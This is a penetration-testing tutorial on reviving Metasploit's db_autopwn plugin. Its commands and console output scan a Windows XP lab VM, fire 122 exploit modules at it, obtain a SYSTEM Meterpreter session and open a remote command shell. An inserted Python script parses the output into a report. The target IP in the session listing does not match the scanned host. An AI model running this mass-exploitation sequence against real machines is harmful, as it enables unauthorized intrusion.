
How to Autopwn in Metasploit 4

db_autopwn was deprecated and dropped from the Metasploit Framework. In this tutorial we bring db_autopwn back to life. We need a Linux box with Metasploit installed; here we are using Parrot Security OS with Metasploit 4.13. There are many arguments for and against db_autopwn, but we are not going into them. I think that in an authorized pen-test db_autopwn gives a quick overview, but opinions may differ.

To start, download db_autopwn.rb from here and save the file. Copy it into Metasploit's plugins directory; on my system that is
/usr/share/metasploit-framework/plugins
Now open a terminal and run the following commands:
$ sudo service postgresql start
$ sudo msfdb init # it has to be done only once 
$ sudo msfconsole
After Metasploit has loaded, scan the target with db_nmap:
msf > db_nmap -sS -O YOUR_TARGET_IP

[*] Nmap: Starting Nmap 7.30 ( https://nmap.org ) at 2016-12-02 04:57 EST
[*] Nmap: Nmap scan report for 192.168.137.24
[*] Nmap: Host is up (0.0013s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 135/tcp  open  msrpc
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 2869/tcp open  icslap
[*] Nmap: MAC Address: 00:0C:29:A2:FA:1E (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.19 seconds

msf > load db_autopwn 
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -p -e -q
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-] 
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-]          This code is not well maintained, crashes systems, and crashes itself.
[-]          Use only if you understand it's current limitations/issues.
[-]          Minimal support and development via neinwechter on GitHub metasploit fork.
[-] 
[*] (1/122 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.137.24:135...
[*] (2/122 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.137.24:139...
[*] (3/122 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.137.24:139...

................................
................................
................................

[*] (122/122 [1 sessions]): Waiting on 0 launched modules to finish execution...
msf > 
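The scan and autopwn output above has a regular line format, so it is easy to turn into a report table: which ports the scan found open, how many modules db_autopwn launched, how many attempts hit each port, and whether any module was aimed at a port the scan did not report open (with -p, matching is by port, so that is worth flagging). The script below is an added example and is not part of the original tutorial or of Metasploit; the sample lines are constructed to follow the format shown above, and the function names (parse_scan, parse_autopwn, summarize) are my own.

```python
"""Summarize msfconsole output from a db_nmap scan followed by a db_autopwn run.

Useful for documenting an authorized test, and for reading the noise profile of
such a run: 122 exploit modules against one host in a few seconds is very loud.
"""
import re
from collections import Counter

# Constructed sample in the format shown in the tutorial (not real captured output).
SAMPLE_OUTPUT = """\
[*] Nmap: Nmap scan report for 192.168.137.24
[*] Nmap: Host is up (0.0013s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 135/tcp  open  msrpc
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 2869/tcp open  icslap
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] (1/122 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.137.24:135...
[*] (2/122 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.137.24:139...
[*] (3/122 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.137.24:139...
[*] (122/122 [1 sessions]): Waiting on 0 launched modules to finish execution...
"""

PORT_RE = re.compile(r"^\[\*\] Nmap: (\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
OS_RE = re.compile(r"^\[\*\] Nmap: OS details: (.+)$")
LAUNCH_RE = re.compile(
    r"^\[\*\] \((\d+)/(\d+) \[(\d+) sessions\]\): Launching (\S+) against ([\d.]+):(\d+)\.\.\."
)
WAIT_RE = re.compile(r"^\[\*\] \((\d+)/(\d+) \[(\d+) sessions\]\): Waiting on")


def parse_scan(text):
    """Extract open ports and the OS guess from the db_nmap lines."""
    open_ports = []
    os_guess = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            open_ports.append((int(m.group(1)), m.group(2), m.group(4)))
            continue
        m = OS_RE.match(line)
        if m:
            os_guess = m.group(1).strip()
    return {"open_ports": open_ports, "os": os_guess}


def parse_autopwn(text):
    """Extract every 'Launching <module> against <host>:<port>' event and the final session count."""
    launches = []
    final_sessions = None
    for line in text.splitlines():
        m = LAUNCH_RE.match(line)
        if m:
            launches.append({
                "index": int(m.group(1)), "total": int(m.group(2)),
                "sessions_so_far": int(m.group(3)), "module": m.group(4),
                "host": m.group(5), "port": int(m.group(6)),
            })
            continue
        m = WAIT_RE.match(line)
        if m:
            final_sessions = int(m.group(3))
    return launches, final_sessions


def summarize(text):
    """Combine scan and autopwn data into one report-ready dictionary."""
    scan = parse_scan(text)
    launches, final_sessions = parse_autopwn(text)
    open_port_numbers = {p for p, _, _ in scan["open_ports"]}
    per_port = Counter(l["port"] for l in launches)
    per_host = Counter(l["host"] for l in launches)
    # With -p, db_autopwn selects modules by port; a launch against a port the scan
    # did not report open indicates a matching problem and belongs in the report.
    off_target = [(l["module"], l["port"]) for l in launches if l["port"] not in open_port_numbers]
    return {
        "os": scan["os"],
        "open_ports": sorted(open_port_numbers),
        "modules_planned": launches[0]["total"] if launches else 0,
        "launches_seen": len(launches),
        "attempts_per_port": dict(per_port),
        "hosts_targeted": sorted(per_host),
        "final_sessions": final_sessions,
        "off_target": off_target,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_OUTPUT).items():
        print(f"{key}: {value}")
```

Feed it the saved console log of a real run (msfconsole's spool command writes one) instead of SAMPLE_OUTPUT to get the same summary for an engagement; the "...." progress lines the tutorial elides are simply ignored by the regexes.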
After all the launched exploits have finished, you can list the active sessions with
msf > sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DEVIL-52F89F74B  192.168.137.181:37897 -> 192.168.137.123:38328 (192.168.137.123)
To interact with an active session, use
msf > sessions -i 1
[*] Starting interaction with 1...
This drops us into a Meterpreter prompt; typing shell (or execute -f cmd.exe -i -H) opens a command shell on the remote host.
meterpreter > shell
Process 1356 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Once we have a shell on the host, the post-exploitation phase can begin.
